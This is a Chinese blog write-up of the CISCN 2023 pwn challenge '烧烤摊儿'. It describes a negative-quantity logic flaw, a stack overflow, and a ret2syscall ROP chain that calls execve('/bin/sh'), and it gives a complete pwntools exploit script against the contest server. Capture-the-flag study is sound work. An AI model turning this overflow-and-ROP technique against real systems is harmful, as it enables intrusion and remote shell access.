【PWN · ret2syscall】[CISCN 2023 初赛]烧烤摊儿

最新推荐文章于 2024-10-30 20:19:12 发布
最新推荐文章于 2024-10-30 20:19:12 发布
阅读量543 收藏 2
点赞数 7
分类专栏: 【PWN · Stack】 文章标签: 安全 pwn ctf ret2syscall 栈溢出漏洞 二进制安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/135950191
版权

好久未做ret2syscall

一、题目分析

漏洞点,栈溢出:

然而到该漏洞点,需要“花钱”买下店铺。个人所有的零钱不够。

利用整数溢出(emmmm这里应该不算溢出漏洞,而是代码逻辑不规范,商品个数不能为负数,但类型确实有符号整数),可增加money

此外,由于程序是静态链接的,所有有大量丰富可利用的Gadget可供我们使用

还有一个细节

name在data段,会复制一份我们输入的字节信息。我们可以在name中写入b’/bin/sh\x00….’,而未开启PIE,地址是固定的,因此rdi的值(’/bin/sh\x00’字符串地址)就有了着落。

二、getshell思路:

1、整数溢出增加money

2、“购买店铺”到漏洞点

3、构造payload:b’/bin/sh\x00’+padding+ret2syscall即可

三、exp

from pwn import *
from pwn import p64,u64

context(arch='amd64',log_level='debug')

io=process('./pwn')
io=remote('node4.anna.nssctf.cn',28716)
elf=ELF('./pwn')
# gdb.attach(io)
# input()

io.recvuntil(b'>')
io.sendline(b'2')
io.recvuntil('3. 鸡肉串\n')
io.sendline(b'2')
io.recvuntil('来几串?\n')
io.sendline(b'-100000')
io.recvuntil(b'>')
io.sendline(b'4')
io.recvuntil('老板,你这摊儿,我买了\n')
io.recvuntil('成交\n')
io.recvuntil(b'>')
io.sendline(b'5')
# 0x000000000040264f : pop rdi ; ret
# 0x000000000040a67e : pop rsi ; ret
# 0x0000000000402aae : pop rsp ; ret
# 0x0000000000401b01 : pop rbp ; ret
# 0x0000000000458827 : pop rax ; ret
# 0x00000000004a404b : pop rdx ; pop rbx ; ret
# 0x0000000000402404 : syscall

rdi=0x000000000040264f
rsi=0x000000000040a67e
rdx_rbx=0x0000000004a404b
rax=0x0000000000458827
syscall=0x0000000000402404
bss=0x4e82c0

# 0x4e6000           0x4e9000 rw-p
# 0x4e9000           0x510000 rw-p
# 一开始没注意到name这个data段上可写的变量,想read一个'/bin/sh\x00'到bss段,但是似乎失败了(?)
# read(int fd, void *buf, size_t count);
# read(0,0x4ee000,0x100)
# fd=0
# buf=0x4ee000
# count=0x100
# payload+=p64(rdi)+p64(fd)+p64(rsi)+p64(buf)+p64(rdx_rbp)+p64(0x100)+p64(0)

payload=b'/bin/sh\x00'+b'a'*0x20
# execve(name,0,0)
name=0x4E60F0
payload+=p64(rdi)+p64(name)+p64(rsi)+p64(0)+p64(rdx_rbx)+p64(0)+p64(0)+p64(rax)+p64(59)+p64(syscall)
io.recvuntil('请赐名:\n')
io.sendline(payload)
io.interactive()

总结

回忆ret2syscall

Mr_Fmnwon
关注
专栏目录
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 2万+
2023全国大学生信息安全竞赛(ciscn)部分题解
pwn ret2syscall
young‘s blog
02-11 1005
学了学pwndbg的使用,文章在这里:gdb+pwndbg食用指南 这篇博客注定是一篇水文,因为昨天做了做XCTF攻防世界上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理,导致做不出,对于ret2syscall现在理解的不深刻,在这里记录一下是怎么做的吧,原理懂了再补上。 查看一下文件的基本信息 32位静态链接的程序,开启了NX保护。 由于是静态链接的,所以我...
ciscn2023_烧烤摊儿 wp(python3)
Kata_Jhin的博客
05-29 708
ciscn2023_烧烤摊儿(python3)wp
CISCN2023初赛pwn
qq_51627915的博客
05-29 394
2023ciscn初赛
ciscn2023初赛 writeup
S4n_v1的博客
05-28 3278
第十六届全国大学生信息安全竞赛创新实践能力赛初赛wp。 pwn 2/6, misc 5/7, crypto 4/7, re 2/6, web 3/6
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 1033
随便写写
ret2syscall
m0_62280492的博客
07-16 793
介绍pwn中32位系统和64位系统下的ret2syscall
CTF国赛2023 - ukfc(四道逆向已下班)
qq_59700927的博客
05-28 2519
小明拿到了内网一个老旧服务的应用包,虽然有漏洞但是怎么利用他呢?这个函数中,%s读取字节无上限,导致缓冲区可以溢出到返回地址,由此我们着重进入这个函数并执行rop链。没有负数检查,直接减掉10*v9,那我们可以减掉一个大负数使得money大于100000。可以确定的是最后三位地址一定不会发生变化,那只需要对第四位爆破0xf位地址即可。有canary,原题:CSDN Canary学习(爆破Canary)程序是有pie的,我们直接修改下两位地址即可。先传入L文件,在传入R文件,然后。其中有flag,找到即可。
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3656
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1668
pwn练习1-ret2syscall(ROP-gadget)
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 1012
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
前端如何安全存储密钥,防止信息泄露
最新发布
AM1n98的博客
10-30 1255
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常见的前端密钥存储方案。
轻型民用无人驾驶航空器安全操控理论培训知识总结-多旋翼部分
Lizzy_Fly的博客
10-30 914
15.航空器的视觉避障只有在光照等环境条件满足视觉系统工作要求时才能生效,光照条件特别暗或者特别亮的情况下,请谨慎飞行,即使视觉系统正常工作时,也可能无法精准识别高压线,而且高压线还会影响图传和遥控信号,因此不建议在高压线间飞行,如因电力巡检等工作原因必须在此环境下飞行,建议经专门培训后再进行操作;当航空器记录了返航点并且在定位服务良好的情况下,航空器电池电量不足、遥控器与航空器之间失去通讯信号以及图传信号丢失时,将会触发自动返航,操控员也可主动开启自动返航,航空器将自动返回返航点并降落。
Linux系统安全配置
qq_24442273的博客
10-28 955
【代码】Linux系统安全配置。
【Python爬虫实战】网络爬虫完整指南:HTTP/HTTPS协议与爬虫安全实践
小火龙的博客
10-29 1198
是互联网的核心协议之一,用于在客户端(如浏览器或爬虫)和服务器之间传输数据。HTTP协议定义了请求和响应的格式,帮助不同设备进行信息交换,例如我们在浏览网页时,浏览器就是通过HTTP向服务器请求页面内容,然后显示在用户面前。是HTTP协议的升级版,通过SSL/TLS加密协议增强了数据传输的安全性。HTTPS协议会在数据传输过程中对数据进行加密,防止中途被拦截或篡改,因此在保护用户隐私和敏感信息方面起到了重要作用。
网站被浏览器提示不安全怎么办?——附解决方案
2403_87921797的博客
10-30 583
首先,确保你的网站使用了有效的SSL证书。使用安全扫描工具来检测潜在的安全问题。记住,网站安全不仅关乎用户体验,也直接影响到网站的搜索排名和信誉。:在解决问题期间,通过社交媒体、电子邮件等方式通知用户你的网站正在进行安全维护,以减少用户的不信任感。:如果你已经解决了安全问题,可以向浏览器提供商提交重新审查的请求,以便他们更新你的网站安全状态。:即使问题得到解决,也需要持续监控网站的安全状态,防止未来再次出现安全问题。:确保你的网站托管服务提供商具有良好的安全记录,能够提供必要的安全支持。
重磅新品丨Fortinet 发布 Lacework FortiCNAPP,强化云原生应用安全
Sophya89的博客
10-30 986
致力于网络与安全融合的全球网络安全供应商 Fortinet®(纳斯达克代码:FTNT)近日宣布,推出了一款全新人工智能(AI)驱动的统一防护平台——Lacework FortiCNAPP,该平台依托单一供应商优势,全面覆盖从代码安全到云安全的应用程序全生命周期。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值